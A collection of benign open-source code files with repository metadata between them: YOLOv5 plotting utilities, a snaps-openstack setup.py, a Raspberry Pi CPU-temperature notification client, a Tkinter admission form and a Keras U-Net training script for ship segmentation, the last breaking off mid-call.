ax = plt.subplots(2, 4, figsize=(10, 6), tight_layout=True)[1].ravel()
fig2, ax2 = plt.subplots(1, 1, figsize=(8, 4), tight_layout=True)
# for f in [save_dir / f'study_coco_{x}.txt' for x in ['yolov5n6', 'yolov5s6', 'yolov5m6', 'yolov5l6', 'yolov5x6']]:
for f in sorted(save_dir.glob('study*.txt')):
y = np.loadtxt(f, dtype=np.float32, usecols=[0, 1, 2, 3, 7, 8, 9], ndmin=2).T
x = np.arange(y.shape[1]) if x is None else np.array(x)
if plot2:
s = ['P', 'R', 'mAP@.5', 'mAP@.5:.95', 't_preprocess (ms/img)', 't_inference (ms/img)', 't_NMS (ms/img)']
for i in range(7):
ax[i].plot(x, y[i], '.-', linewidth=2, markersize=8)
ax[i].set_title(s[i])
j = y[3].argmax() + 1
ax2.plot(y[5, 1:j], y[3, 1:j] * 1E2, '.-', linewidth=2, markersize=8,
label=f.stem.replace('study_coco_', '').replace('yolo', 'YOLO'))
ax2.plot(1E3 / np.array([209, 140, 97, 58, 35, 18]), [34.6, 40.5, 43.0, 47.5, 49.7, 51.5],
'k.-', linewidth=2, markersize=8, alpha=.25, label='EfficientDet')
ax2.grid(alpha=0.2)
ax2.set_yticks(np.arange(20, 60, 5))
ax2.set_xlim(0, 57)
ax2.set_ylim(25, 55)
ax2.set_xlabel('GPU Speed (ms/img)')
ax2.set_ylabel('COCO AP val')
ax2.legend(loc='lower right')
f = save_dir / 'study.png'
print(f'Saving {f}...')
plt.savefig(f, dpi=300)
@try_except # known issue https://github.com/ultralytics/yolov5/issues/5395
@Timeout(30) # known issue https://github.com/ultralytics/yolov5/issues/5611
def plot_labels(labels, names=(), save_dir=Path('')):
# plot dataset labels
LOGGER.info(f"Plotting labels to {save_dir / 'labels.jpg'}... ")
c, b = labels[:, 0], labels[:, 1:].transpose() # classes, boxes
nc = int(c.max() + 1) # number of classes
x = pd.DataFrame(b.transpose(), columns=['x', 'y', 'width', 'height'])
# seaborn correlogram
sn.pairplot(x, corner=True, diag_kind='auto', kind='hist', diag_kws=dict(bins=50), plot_kws=dict(pmax=0.9))
plt.savefig(save_dir / 'labels_correlogram.jpg', dpi=200)
plt.close()
# matplotlib labels
matplotlib.use('svg') # faster
ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)[1].ravel()
y = ax[0].hist(c, bins=np.linspace(0, nc, nc + 1) - 0.5, rwidth=0.8)
# [y[2].patches[i].set_color([x / 255 for x in colors(i)]) for i in range(nc)] # update colors bug #3195
ax[0].set_ylabel('instances')
if 0 < len(names) < 30:
ax[0].set_xticks(range(len(names)))
ax[0].set_xticklabels(names, rotation=90, fontsize=10)
else:
ax[0].set_xlabel('classes')
sn.histplot(x, x='x', y='y', ax=ax[2], bins=50, pmax=0.9)
sn.histplot(x, x='width', y='height', ax=ax[3], bins=50, pmax=0.9)
# rectangles
labels[:, 1:3] = 0.5 # center
labels[:, 1:] = xywh2xyxy(labels[:, 1:]) * 2000
img = Image.fromarray(np.ones((2000, 2000, 3), dtype=np.uint8) * 255)
for cls, *box in labels[:1000]:
ImageDraw.Draw(img).rectangle(box, width=1, outline=colors(cls)) # plot
ax[1].imshow(img)
ax[1].axis('off')
for a in [0, 1, 2, 3]:
for s in ['top', 'right', 'left', 'bottom']:
ax[a].spines[s].set_visible(False)
plt.savefig(save_dir / 'labels.jpg', dpi=200)
matplotlib.use('Agg')
plt.close()
def plot_evolve(evolve_csv='path/to/evolve.csv'): # from utils.plots import *; plot_evolve()
# Plot evolve.csv hyp evolution results
evolve_csv = Path(evolve_csv)
data = pd.read_csv(evolve_csv)
keys = [x.strip() for x in data.columns]
x = data.values
f = fitness(x)
j = np.argmax(f) # max fitness index
plt.figure(figsize=(10, 12), tight_layout=True)
matplotlib.rc('font', **{'size': 8})
for i, k in enumerate(keys[7:]):
v = x[:, 7 + i]
mu = v[j] # best single result
plt.subplot(6, 5, i + 1)
plt.scatter(v, f, c=hist2d(v, f, 20), cmap='viridis', alpha=.8, edgecolors='none')
plt.plot(mu, f.max(), 'k+', markersize=15)
plt.title(f'{k} = {mu:.3g}', fontdict={'size': 9}) # limit to 40 characters
if i % 5 != 0:
plt.yticks([])
print(f'{k:>15}: {mu:.3g}')
f = evolve_csv.with_suffix('.png') # filename
plt.savefig(f, dpi=200)
plt.close()
print(f'Saved {f}')
def plot_results(file='path/to/results.csv', dir=''):
# Plot training results.csv. Usage: from utils.plots import *; plot_results('path/to/results.csv')
save_dir = Path(file).parent if file else Path(dir)
fig, ax = plt.subplots(2, 5, figsize=(12, 6), tight_layout=True)
ax = ax.ravel()
files = list(save_dir.glob('results*.csv'))
assert len(files), f'No results.csv files found in {save_dir.resolve()}, nothing to plot.'
for fi, f in enumerate(files):
try:
data = pd.read_csv(f)
s = [x.strip() for x in data.columns]
x = data.values[:, 0]
for i, j in enumerate([1, 2, 3, 4, 5, 8, 9, 10, 6, 7]):
y = data.values[:, j]
# y[y == 0] = np.nan # don't show zero values
ax[i].plot(x, y, marker='.', label=f.stem, linewidth=2, markersize=8)
ax[i].set_title(s[j], fontsize=12)
# if j in [8, 9, 10]: # share train and val loss y axes
# ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])
except Exception as e:
print(f'Warning: Plotting error for {f}: {e}')
ax[1].legend()
fig.savefig(save_dir / 'results.png', dpi=200)
plt.close()
def profile_idetection(start=0, stop=0, labels=(), save_dir=''):
# Plot iDetection '*.txt' per-image logs. from utils.plots import *; profile_idetection()
ax = plt.subplots(2, 4, figsize=(12, 6), tight_layout=True)[1].ravel()
s = ['Images', 'Free Storage (GB)', 'RAM Usage (GB)', 'Battery', 'dt_raw (ms)', 'dt_smooth (ms)', 'real-world FPS']
files = list(Path(save_dir).glob('frames*.txt'))
for fi, f in enumerate(files):
try:
results = np.loadtxt(f, ndmin=2).T[:, 90:-30] # clip first and last rows
n = results.shape[1] # number of rows
x = np.arange(start, min(stop, n) if stop else n)
results = results[:, x]
t = (results[0] - results[0].min()) # set t0=0s
results[0] = x
for i, a in enumerate(ax):
if i < len(results):
label = labels[fi] if len(labels) else f.stem.replace('frames_', '')
a.plot(t, results[i], marker='.', label=label, linewidth=1, markersize=5)
a.set_title(s[i])
a.set_xlabel('time (s)')
# if fi == len(files) - 1:
# a.set_ylim(bottom=0)
for side in ['top', 'right']:
a.spines[side].set_visible(False)
else:
a.remove()
except Exception as e:
print(f'Warning: Plotting error for {f}; {e}')
ax[1].legend()
plt.savefig(Path(save_dir) / 'idetection_profile.png', dpi=200)
def save_one_box(xyxy, im, file='image.jpg', gain=1.02, pad=10, square=False, BGR=False, save=True):
# Save image crop as {file} with crop size multiple {gain} and {pad} pixels. Save and/or return crop
xyxy = torch.tensor(xyxy).view(-1, 4)
b = xyxy2xywh(xyxy) # boxes
if square:
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # attempt rectangle to square
b[:, 2:] = b[:, 2:] * gain + pad # box wh * gain + pad
xyxy = xywh2xyxy(b).long()
clip_coords(xyxy, im.shape)
crop = im[int(xyxy[0, 1]):int(xyxy[0, 3]), int(xyxy[0, 0]):int(xyxy[0, 2]), ::(1 if BGR else -1)]
if save:
file.parent.mkdir(parents=True, exist_ok=True) # make directory
cv2.imwrite(str(increment_path(file).with_suffix('.jpg')), crop)
return crop
| ziyan0302/Yolov5_DeepSort_Pytorch_ros | Yolov5_DeepSort_Pytorch/yolov5/utils/plots.py | plots.py | py | 29,223 | python | en | code | 5 | github-code | 1 | [
{
"api_name": "utils.general.user_config_dir",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "matplotlib.rc",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "matplotlib.use"... |
23829749926 | try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup
config = {
'description': 'SNAPS OpenStack Installer',
'author': 'Steve Pisarski',
'url': 'https://github.com/cablelabs/snaps-openstack',
'download_url': 'https://github.com/cablelabs/snaps-openstack/archive/master.zip',
'author_email': 's.pisarski@cablelabs.com',
'version': '1.0',
'packages': find_packages(),
'install_requires': ['ansible==2.7.10',
'pathlib',
'six',
'pyyaml'],
'scripts': [],
'name': 'snaps-openstack'
}
setup(**config)
| cablelabs/snaps-openstack | setup.py | setup.py | py | 667 | python | en | code | 9 | github-code | 1 | [
{
"api_name": "setuptools.find_packages",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "distutils.core.setup",
"line_number": 22,
"usage_type": "call"
}
] |
4046943676 | import os
import threading
import common.Api_pb2 as oap_api
from common.Client import Client, ClientEventHandler
from gpiozero import CPUTemperature
# Define cpu threshold (*C)
CPU_THRESHOLD = 60
cpu = CPUTemperature()
class EventHandler(ClientEventHandler):
def __init__(self):
self._notification_channel_id = None
self._timer = None
def on_hello_response(self, client, message):
print((f"received hello response, result: {message.result}," +
f"oap version: {message.oap_version.major}.{message.oap_version.minor}," +
f"api version: {message.api_version.major}.{message.api_version.minor}")
)
register_notification_channel_request = oap_api.RegisterNotificationChannelRequest(
)
register_notification_channel_request.name = "Power Management Notification Channel"
register_notification_channel_request.description = (
"Notification channel for power management alerts"
)
client.send(oap_api.MESSAGE_REGISTER_NOTIFICATION_CHANNEL_REQUEST, 0,
register_notification_channel_request.SerializeToString())
def on_register_notification_channel_response(self, client, message):
print(
(f"register notification channel response, result: {message.result}," +
f"icon id: {message.id}")
)
self._notification_channel_id = message.id
if message.result == (
oap_api.RegisterNotificationChannelResponse.REGISTER_NOTIFICATION_CHANNEL_RESULT_OK
):
print("notification channel successfully registered")
self.show_notification(client)
def show_notification(self, client):
cpu_temperature = cpu.temperature
if cpu_temperature > CPU_THRESHOLD:
cpu_temp_format = str(round(cpu_temperature,1))+'\N{DEGREE SIGN}'+'C'
print("sending notification")
show_notification = oap_api.ShowNotification()
show_notification.channel_id = self._notification_channel_id
show_notification.title = "CPU Temperature Alert"
show_notification.description = "CPU temperature is "+cpu_temp_format
show_notification.single_line = "CPU Temp - "+cpu_temp_format
with open("assets/notification_icon.svg", 'rb') as icon_file:
show_notification.icon = icon_file.read()
with open("assets/notification_sound.wav", 'rb') as sound_file:
show_notification.sound_pcm = sound_file.read()
client.send(oap_api.MESSAGE_SHOW_NOTIFICATION, 0,
show_notification.SerializeToString())
self._timer = threading.Timer(60, self.show_notification, [client])
self._timer.start()
def get_notification_channel_id(self):
return self._notification_channel_id
def get_timer(self):
return self._timer
def main():
client = Client("cpu temp notification")
event_handler = EventHandler()
client.set_event_handler(event_handler)
client.connect('127.0.0.1', 44405)
active = True
while active:
try:
active = client.wait_for_message()
except KeyboardInterrupt:
break
if event_handler.get_timer() is not None:
event_handler.get_timer().cancel()
if event_handler.get_notification_channel_id() is not None:
unregister_notification_channel = oap_api.UnregisterNotificationChannel(
)
unregister_notification_channel.id = event_handler.get_notification_channel_id(
)
client.send(oap_api.MESSAGE_UNREGISTER_NOTIFICATION_CHANNEL, 0,
unregister_notification_channel.SerializeToString())
client.disconnect()
if __name__ == "__main__":
main()
| tigattack/CarPi | pi/scripts/cpu_temp_monitor.py | cpu_temp_monitor.py | py | 3,828 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "gpiozero.CPUTemperature",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "common.Client.ClientEventHandler",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "common.Api_pb2.RegisterNotificationChannelRequest",
"line_number": 25,
"usage_ty... |
38367714869 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 21 13:23:27 2017
Plots two mass spectra on one set of axes and notates m/z of the peak(s)
with the highest relative intensity.
@author: emeryusher
"""
# import python modules for plotting etc.
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import argrelextrema
# import files into two separate arrays (one is the control; one is the reaction)
temp1 = np.loadtxt('chloro_ref_rxnA_0_F3_1.txt')
temp2 = np.loadtxt('chloro_ref_rxnC_0_F5_1.txt')
# normalize data set to the maximum intensity in the dataset
temp1[:,1] = temp1[:,1]/(np.amax(temp1[:,1]))
temp2[:,1] = temp2[:,1]/(np.amax(temp2[:,1]))
# determine local extrema; if you find that it picks too many peaks, increase
# the value for "order"
max1 = argrelextrema(temp1[:,1], np.greater, order = 5000)
max2 = argrelextrema(temp2[:,1], np.greater, order = 5000)
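# Toy illustration of argrelextrema (made-up values, small window):
#   argrelextrema(np.array([0., 2., 1., 3., 1.]), np.greater, order=1) -> (array([1, 3]),)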
#plot intensity versus m/z
plt.plot(temp1[:,0], temp1[:,1], color = "grey", linewidth = 1.0, label = 'H3K9R')
plt.plot(temp2[:,0], temp2[:,1], color = "k", linewidth = 1.0, label = 'H3K9RMe')
# enter the bounds to be used for picking the maxima to plot (m/z)
win1_max = 2300
win1_min = 2200
win2_max = 2400
win2_min = 2200
# pick extrema for each data set
for i in max1[0]:
    # Conditional statement to calculate maxima of points in a specific range.
    # adds an m/z label for picked maxima
    if ((temp1[:,0][i] > win1_min) and (temp1[:,0][i] < win1_max)):
plt.annotate(str(temp1[:,0][i]), xy=(temp1[:,0][i], temp1[:,1][i]+0.1), horizontalalignment = 'center', fontsize = 8, rotation=45)
for i in max2[0]:
    # Conditional statement to calculate maxima of points in a specific range.
    # adds an m/z label for picked maxima
    if ((temp2[:,0][i] > win2_min) and (temp2[:,0][i] < win2_max)):
plt.annotate(str(temp2[:,0][i]), xy=(temp2[:,0][i], temp2[:,1][i]+0.1), horizontalalignment = 'center', fontsize = 8, rotation=45)
## plotting stuff ##
plt.legend(loc='upper right')
plt.xlabel('m/z')
plt.ylabel('Intensity')
plt.title('H3K9R peptide methylation')
plt.xlim(2240, 2340)
plt.ylim([-0.05, 1.2])
plt.tight_layout()
# uncomment the following line to save spectrum plot
#plt.savefig('PRDM9_methylation.png', format = 'png', dpi = 300)
plt.show()
| idpemery/random-python-scripts | MS_ref_overlay.py | MS_ref_overlay.py | py | 2,275 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.loadtxt",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.amax",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.amax",
"line_number"... |
28389679037 | from networks import AdaINGen, VAEGen, NetV2_128x128
from utils import weights_init, get_model_list, vgg_preprocess, load_vgg16, load_vgg19, get_scheduler
from torch.autograd import Variable
import torch
import torch.nn as nn
import os
class FACE_Trainer(nn.Module):
def __init__(self, hyperparameters):
super(FACE_Trainer, self).__init__()
lr = hyperparameters['lr']
# Initiate the networks
if hyperparameters['net_version'] == 'v2' and hyperparameters['crop_image_height'] == 128:
self.gen = NetV2_128x128(hyperparameters['input_dim_a'], hyperparameters['input_dim_b'], hyperparameters['input_dim_a'])
self.instancenorm = nn.InstanceNorm2d(512, affine=False)
# Setup the optimizers
beta1 = hyperparameters['beta1']
beta2 = hyperparameters['beta2']
gen_params = list(self.gen.parameters())
self.gen_opt = torch.optim.Adam([p for p in gen_params if p.requires_grad],
lr=lr, betas=(beta1, beta2), weight_decay=hyperparameters['weight_decay'])
self.gen_scheduler = get_scheduler(self.gen_opt, hyperparameters)
self.l1loss = nn.L1Loss(size_average=True)
# Network weight initialization
self.apply(weights_init(hyperparameters['init']))
# Load VGG model if needed
if 'vgg_w' in hyperparameters.keys() and hyperparameters['vgg_w'] > 0:
            if hyperparameters['vgg_net'] == 'vgg16':
self.vgg = load_vgg16(hyperparameters['vgg_model_path'] + '/models')
self.vgg.eval()
for param in self.vgg.parameters():
param.requires_grad = False
else:
self.vgg = load_vgg19()
self.vgg.eval()
def recon_criterion(self, input, target):
return torch.mean(torch.abs(input-target))
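    # Note: this is the mean absolute error over all elements, i.e. the same value
    # nn.L1Loss(reduction='mean') would return for the same pair of tensors.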
def forward(self, x_a, x_b):
self.eval()
output = self.gen(x_a,x_b)
self.train()
return output
def __latent_kl(self, p, q):
mean_1 = p
mean_2 = q
kl_loss = 0.5 * torch.pow(mean_1-mean_2, 2)
kl_loss = torch.mean(kl_loss)
return kl_loss
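    # This is the closed-form KL between two unit-variance Gaussians that differ only
    # in their means: KL(N(p, I) || N(q, I)) = 0.5 * (p - q)^2 per element, averaged here.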
def gen_update(self, x, y, hyperparameters):
self.gen_opt.zero_grad()
output = self.gen(x, y)
self.loss_gen_recon = 0
self.loss_gen_recon_kl_1 = 0
self.loss_gen_recon_kl_2 = 0
self.loss_gen_vgg = 0
# reconstruction loss
if hyperparameters['recon_w'] != 0:
self.loss_gen_recon = self.recon_criterion(output[-1], x)
if hyperparameters['kl_w'] != 0:
self.loss_gen_recon_kl_1 = self.__latent_kl(output[0], output[2])
self.loss_gen_recon_kl_2 = self.__latent_kl(output[1], output[3])
# perceptual loss
if hyperparameters['vgg_w'] != 0:
self.loss_gen_vgg = self.compute_vgg_loss(self.vgg, output[-1], x, hyperparameters) if hyperparameters['vgg_w'] > 0 else 0
# total loss
self.loss_gen_total = hyperparameters['recon_w'] * self.loss_gen_recon + \
hyperparameters['kl_w'] * self.loss_gen_recon_kl_1 + \
hyperparameters['kl_w'] * self.loss_gen_recon_kl_2 + \
hyperparameters['vgg_w'] * self.loss_gen_vgg
self.loss_gen_total.backward()
self.gen_opt.step()
def compute_vgg_loss(self, vgg, img, target, hyperparameters):
img_vgg = vgg_preprocess(img)
target_vgg = vgg_preprocess(target)
img_fea = vgg(img_vgg)
target_fea = vgg(target_vgg)
total_loss = 0
for i in range(len(img_fea)):
total_loss += hyperparameters['feature_weights'][i] * torch.mean(torch.abs(img_fea[i]-target_fea[i]))
return total_loss
    def sample(self, x_a, x_b):
        # NOTE: leftover from a MUNIT-style two-generator trainer: it references
        # self.gen_a / self.gen_b and latents h_a / h_b that this class never defines,
        # and x_a_recon / x_b_recon stay empty, so calling this will raise.
        # Use transfer() below instead.
        self.eval()
x_a_recon, x_b_recon, x_ba, x_ab = [], [], [], []
for i in range(x_a.size(0)):
x_ba.append(self.gen_a.decode(h_b))
x_ab.append(self.gen_b.decode(h_a))
x_a_recon, x_b_recon = torch.cat(x_a_recon), torch.cat(x_b_recon)
x_ba = torch.cat(x_ba)
x_ab = torch.cat(x_ab)
self.train()
return x_a, x_a_recon, x_ab, x_b, x_b_recon, x_ba
def transfer(self,x_a,x_b):
self.eval()
out = self.gen(x_a,x_b)
self.train()
return out
def update_learning_rate(self):
if self.gen_scheduler is not None:
self.gen_scheduler.step()
def resume(self, checkpoint_dir, hyperparameters):
# Load generators
last_model_name = get_model_list(checkpoint_dir, "gen")
state_dict = torch.load(last_model_name)
self.gen.load_state_dict(state_dict['gen_weight'])
iterations = int(last_model_name[-11:-3])
# Load optimizers
state_dict = torch.load(os.path.join(checkpoint_dir, 'optimizer.pt'))
self.gen_opt.load_state_dict(state_dict['gen'])
# Reinitilize schedulers
self.gen_scheduler = get_scheduler(self.gen_opt, hyperparameters, iterations)
print('Resume from iteration %d' % iterations)
return iterations
def save(self, snapshot_dir, iterations):
# Save generators, and optimizers
gen_name = os.path.join(snapshot_dir, 'gen_%08d.pt' % (iterations + 1))
opt_name = os.path.join(snapshot_dir, 'optimizer.pt')
torch.save({'gen_weight': self.gen.state_dict()}, gen_name)
torch.save({'gen': self.gen_opt.state_dict()}, opt_name)
| TheSouthFrog/stylealign | pytorch_code/trainer.py | trainer.py | py | 5,877 | python | en | code | 182 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "networks.NetV2_128x128",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.nn.InstanceN... |
31891970363 | from termcolor import cprint
from tkinter import *
from ttkthemes import themed_tk
from tkinter import ttk , messagebox, filedialog
from PIL import Image, ImageTk
vendara = ['Vendara', 14]
root = themed_tk.ThemedTk()
root.geometry('900x600+500+200')
root.title('Admission-helper: Administrator Version')
root.set_theme('plastik')
# Functions
def callback():
print(name_var.get())
print(age_var.get())
æ = parent_var.get().split(',')
ś = []
for ā in æ:
if ā.replace(' ','') != '':
ś.append(ā.replace(' ', ''))
del æ
æ = ś
del ś
print(æ)
    messagebox.showinfo('Info!', 'Admission successfully added!')
def parents():
messagebox.showinfo('Help', 'Parent name(s) seperated by commas(spaces not allowed!)\n\nexample:\n\n parent.A, parent.B')
# Vars
name_var = StringVar()
age_var = IntVar()
age_var.set(6)
parent_var = StringVar()
parent_info = ImageTk.PhotoImage(image=Image.open('assets/icons/info-sign-icon.png'))
min_age = 6
max_age = 18
ages = []
for i in range(min_age, max_age + 1):
ages.append(i)
# Buttons
submit_btn = ttk.Button(root, text='Submit', command=callback, width=12)
btn_pname_info = Button(root, image=parent_info, border=0, command=parents)
# Labels
lbl_sname = ttk.Label(root, font=vendara, text='Student Full Name:', )
lbl_sage = ttk.Label(root, font=vendara, text='Student Age:')
lbl_pname = ttk.Label(root, font=vendara, text='Parent Name(s):')
# Entrys
ent_sname = ttk.Entry(root, font=vendara, textvariable=name_var ,width=50)
ent_sage = ttk.Spinbox(root, font=vendara, textvariable=age_var ,width=48, values=ages, state='readonly')
ent_pname = ttk.Entry(root, font=vendara, textvariable=parent_var, width=50)
# grid
lbl_sname.grid(row=0, column=0)
ent_sname.grid(row=0, column=1, pady=10)
lbl_sage.grid(row=1, column=0)
ent_sage.grid(row=1, column=1)
lbl_pname.grid(row=2, column=0)
ent_pname.grid(row=2, column=1, pady=10)
btn_pname_info.grid(row=2, column=2, ipadx=10)
submit_btn.grid(row=3, column=0)
root.resizable(False, False)
# Mainloop
if __name__ == '__main__':
root.mainloop()
| Advik-B/Admission-helper | main.py | main.py | py | 2,112 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "ttkthemes.themed_tk.ThemedTk",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "ttkthemes.themed_tk",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 26,
"usage_type": "call"
},
{
"api_na... |
37869013076 | import numpy as np
import pandas as pd
import cv2
from sklearn.model_selection import train_test_split
import tensorflow as tf
import keras
from keras.models import Model
from keras.models import load_model
from keras.layers import Input, Dense, Concatenate
from keras.layers import Dense, GlobalAveragePooling2D, Dropout, UpSampling2D, Conv2D, MaxPooling2D, Activation, Dropout
from keras.optimizers import adam_v2
from keras import backend as K
# Metrics
def dice_coeff(y_true, y_pred):
smooth = 1.
# Flatten
y_true_f = tf.reshape(y_true, [-1])
y_pred_f = tf.reshape(y_pred, [-1])
intersection = tf.reduce_sum(y_true_f * y_pred_f)
score = (2. * intersection + smooth) / (tf.reduce_sum(y_true_f) + tf.reduce_sum(y_pred_f) + smooth)
return score
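# Sanity check (toy masks): identical binary masks score exactly 1.0 thanks to the
# smoothing term, e.g. for y = tf.ones((2, 2)):
#   dice_coeff(y, y) = (2*4 + 1) / (4 + 4 + 1) = 1.0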
def recall(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall_keras = true_positives / (possible_positives + K.epsilon())
return recall_keras
def precision(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision_keras = true_positives / (predicted_positives + K.epsilon())
return precision_keras
def f1(y_true, y_pred):
p = precision(y_true, y_pred)
r = recall(y_true, y_pred)
return 2 * ((p * r) / (p + r + K.epsilon()))
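# Worked toy example: with precision 0.5 and recall 1.0,
# f1 = 2 * (0.5 * 1.0) / (0.5 + 1.0) ~= 0.667 (the harmonic mean of the two).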
# Load data
masks = pd.read_csv('train_ship_segmentations_v2.csv')
print('CSV file loaded')
# Split data into train, validation and test sets (70:28:2)
train_df = masks[:230000]
test_df = masks[230000:]
test_df.reset_index(drop = True, inplace = True)
train_df = train_df.dropna(axis = 'index') # images without ships aren't needed for training
train_df, val_df = train_test_split (train_df, test_size = 0.3, random_state = 42)
# Function for decoding RLE labels into masks
def rle_decode(mask_rle, shape = (768, 768)):
s = mask_rle.split()
starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]
starts -= 1
ends = starts + lengths
img = np.zeros(shape[0] * shape[1], dtype = np.uint8)
for lo, hi in zip(starts, ends):
img[lo:hi] = 1
return img.reshape(shape).T
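# Toy example: rle_decode("1 3", shape=(3, 3)) sets flat pixels 0..2, which after the
# final transpose become the first column of the 3x3 mask.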
# Generators for Model training (to reduce memory usage)
def img_generator(gen_df, batch_size):
while True:
x_batch = []
y_batch = []
for i in range(batch_size):
img_name, mask_rle = gen_df.sample(1).values[0] # get row from DF
img = cv2.imread('train_v2/'+ img_name) # read img
img_masks = masks.loc[masks['ImageId'] == img_name, 'EncodedPixels'].tolist()
all_masks = np.zeros((768, 768)) # find ship masks for more the one ship
for mask in img_masks: # create a single mask for all ships
all_masks += rle_decode(mask)
img = cv2.resize(img, (256, 256)) # resize img to 256,256
mask = cv2.resize(all_masks, (256, 256)) # resize mask to 256,256
x_batch += [img] # put into batch
y_batch += [mask]
x_batch = np.array(x_batch) / 255. # reduce color dimension img
y_batch = np.array(y_batch)
yield x_batch, np.expand_dims(y_batch, -1) # return batch
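# Usage sketch: one draw from the generator yields arrays shaped
#   x: (batch_size, 256, 256, 3) scaled to [0, 1], y: (batch_size, 256, 256, 1)
# e.g. x, y = next(img_generator(train_df, 16))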
# Make the Model
inp = Input(shape=(256, 256, 3)) # input layer with shape 256x256 and 3 chanels
conv_1_1 = Conv2D(32, (3, 3), padding = 'same')(inp) # increase filters number to 32, kernel size 3x3
conv_1_1 = Activation('relu')(conv_1_1)
conv_1_2 = Conv2D(32, (3, 3), padding = 'same')(conv_1_1)
conv_1_2 = Activation('relu')(conv_1_2)
pool_1 = MaxPooling2D(2)(conv_1_2) # reduce image size
conv_2_1 = Conv2D(64, (3, 3), padding = 'same')(pool_1) # increase filters number to 64
conv_2_1 = Activation('relu')(conv_2_1)
conv_2_2 = Conv2D(64, (3, 3), padding = 'same')(conv_2_1)
conv_2_2 = Activation('relu')(conv_2_2)
pool_2 = MaxPooling2D(2)(conv_2_2) # reduce image size
conv_3_1 = Conv2D(128, (3, 3), padding = 'same')(pool_2) # increase filters number to 128
conv_3_1 = Activation('relu')(conv_3_1)
conv_3_2 = Conv2D(128, (3, 3), padding = 'same')(conv_3_1)
conv_3_2 = Activation('relu')(conv_3_2)
pool_3 = MaxPooling2D(2)(conv_3_2) # reduce image size
conv_4_1 = Conv2D(256, (3, 3), padding = 'same')(pool_3) # increase filters number to 256
conv_4_1 = Activation('relu')(conv_4_1)
conv_4_2 = Conv2D(256, (3, 3), padding = 'same')(conv_4_1)
conv_4_2 = Activation('relu')(conv_4_2)
pool_4 = MaxPooling2D(2)(conv_4_2) # reduce image size
up_1 = UpSampling2D(2, interpolation = 'bilinear')(pool_4) # increase image size
conc_1 = Concatenate()([conv_4_2, up_1]) # concatenate with the same-size encoder layer (skip connection) to recover low-level info
conv_up_1_1 = Conv2D(256, (3, 3), padding = 'same')(conc_1)
conv_up_1_1 = Activation('relu')(conv_up_1_1)
conv_up_1_2 = Conv2D(256, (3, 3), padding = 'same')(conv_up_1_1)
conv_up_1_2 = Activation('relu')(conv_up_1_2)
up_2 = UpSampling2D(2, interpolation = 'bilinear')(conv_up_1_2) # increase image size
conc_2 = Concatenate()([conv_3_2, up_2]) # concatenate with the same-size encoder layer (skip connection) to recover low-level info
conv_up_2_1 = Conv2D(128, (3, 3), padding = 'same')(conc_2) # reduce filter number to 128
conv_up_2_1 = Activation('relu')(conv_up_2_1)
conv_up_2_2 = Conv2D(128, (3, 3), padding = 'same')(conv_up_2_1)
conv_up_2_2 = Activation('relu')(conv_up_2_2)
up_3 = UpSampling2D(2, interpolation = 'bilinear')(conv_up_2_2) # increase image size
conc_3 = Concatenate()([conv_2_2, up_3]) # concatenate with the same-size encoder layer (skip connection) to recover low-level info
conv_up_3_1 = Conv2D(64, (3, 3), padding = 'same')(conc_3) # reduce filter number to 64
conv_up_3_1 = Activation('relu')(conv_up_3_1)
conv_up_3_2 = Conv2D(64, (3, 3), padding='same')(conv_up_3_1)
conv_up_3_2 = Activation('relu')(conv_up_3_2)
up_4 = UpSampling2D(2, interpolation = 'bilinear')(conv_up_3_2) # increase image size
conc_4 = Concatenate()([conv_1_2, up_4]) # concatenate with the same-size encoder layer (skip connection) to recover low-level info
conv_up_4_1 = Conv2D(32, (3, 3), padding = 'same')(conc_4) # reduce filter number to 32
conv_up_4_1 = Activation('relu')(conv_up_4_1)
conv_up_4_2 = Conv2D(1, (3, 3), padding = 'same')(conv_up_4_1)
conv_up_4_3 = Dropout(0.5)(conv_up_4_2) # avoid overfitting
result = Activation('sigmoid')(conv_up_4_3) # output layer with sigmoid activation giving the probability that a pixel belongs to a ship
model = Model(inputs = inp, outputs = result)
best_w = keras.callbacks.ModelCheckpoint('r34_best.h5', # save best weights during training
monitor = 'val_loss',
verbose = 0,
save_best_only = True,
save_weights_only = True,
mode = 'auto',
period = 1)
last_w = keras.callbacks.ModelCheckpoint('r34_last.h5', # save last weights during training
monitor = 'val_loss',
verbose = 0,
save_best_only = False,
save_weights_only = True,
mode='auto',
period=1)
callbacks = [best_w, last_w]
adam = tf.keras.optimizers.Adam(learning_rate = 0.0001,
beta_1 = 0.9,
beta_2 = 0.999,
epsilon = 1e-08,
decay = 0.0)
model.compile(adam, 'binary_crossentropy', [f1, dice_coeff])
batch_size = 16
print ('Training is started')
model.fit(img_generator(train_df, batch_size),
steps_per_epoch = 100,
epochs = 300,
verbose = 1,
callbacks = callbacks,
validation_data = img_generator(val_df, batch_size),
validation_steps = 10,
class_weight = None,
